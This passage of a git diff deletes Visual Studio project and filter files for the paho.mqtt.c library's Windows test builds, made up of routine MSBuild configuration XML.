-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test1.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTClient.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj.filters
deleted file mode 100644
index f5ae8ca..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test1.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj
deleted file mode 100644
index 9043a64..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj
+++ /dev/null
@@ -1,177 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{A4E14611-05DC-40A1-815B-DA30CA167C9B}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>test2</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\test\test2.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj.filters
deleted file mode 100644
index 79e09c4..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj.filters
+++ /dev/null
@@ -1,45 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test2.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj
deleted file mode 100755
index 8c94f73..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj
+++ /dev/null
@@ -1,178 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTClient.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test3.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ProjectReference Include="..\paho-mqtt3cs\paho-mqtt3cs.vcxproj">

-      <Project>{17f07f98-aa5f-4373-9877-992a341d650a}</Project>

-    </ProjectReference>

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj.filters
deleted file mode 100644
index a63cda7..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test3.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj
deleted file mode 100755
index 31815bb..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj
+++ /dev/null
@@ -1,173 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{29D6A4E9-5A39-4CD3-8A24-348A34832405}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

